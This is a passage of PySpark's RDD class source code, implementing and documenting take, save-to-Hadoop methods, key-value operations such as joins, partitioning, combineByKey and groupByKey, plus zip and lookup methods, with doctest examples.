>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >= 1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
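# Worked example of the estimate above: if num=100, partsScanned=2 and
# only 10 items were found so far, the interpolation suggests
# int(1.5 * 100 * 2 / 10) - 2 = 28 partitions, which the cap reduces to
# partsScanned * 4 = 8 for the next round.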
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
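# Usage sketch (not a doctest), assuming an interactive shell with ``sc``
# and a hypothetical output path; the class names below are standard
# Hadoop classes from the old (mapred) API:
#
#     rdd = sc.parallelize([(1, "a"), (2, "b")])
#     rdd.saveAsHadoopFile("/tmp/hadoop_out",
#                          "org.apache.hadoop.mapred.TextOutputFormat",
#                          keyClass="org.apache.hadoop.io.IntWritable",
#                          valueClass="org.apache.hadoop.io.Text")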
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as the default, because the builtin hash of None
# differs across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid overly large objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
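# Usage sketch (not a doctest): a custom partitionFunc receives the key and
# its result is taken modulo numPartitions, e.g.
#
#     pairs = sc.parallelize([(1, 1), (2, 2), (3, 3), (4, 4)])
#     pairs.partitionBy(2, partitionFunc=lambda k: k % 2).glom().collect()
#
# places the even keys in one partition and the odd keys in the other.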
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = self._can_spill()
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
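# Usage sketch (not a doctest), assuming an interactive shell with ``sc``:
# computing a per-key (sum, count) pair with a (0, 0) zero value:
#
#     rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
#     seq = lambda acc, v: (acc[0] + v, acc[1] + 1)      # merge a value into the accumulator
#     comb = lambda a, b: (a[0] + b[0], a[1] + b[1])     # merge two accumulators
#     sorted(rdd.aggregateByKey((0, 0), seq, comb).collect())
#     # [('a', (3, 2)), ('b', (1, 1))]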
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
def _can_spill(self):
return self.ctx._conf.get("spark.shuffle.spill", "True").lower() == "true"
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)\
if spill else InMemoryMerger(agg)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
# forward the shuffle flag so that coalesce(n, shuffle=True) is not silently ignored
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# The JVM will raise an exception if corresponding partitions have
# different numbers of items.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
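# Illustrative note: with e.g. ``--conf spark.default.parallelism=8`` set on
# the application, reduce-side operations such as groupByKey() and
# reduceByKey() default to 8 output partitions; without it they inherit
# this RDD's current partition count.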
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)], False)
return values.collect()
def _to_java_object_rdd(self):
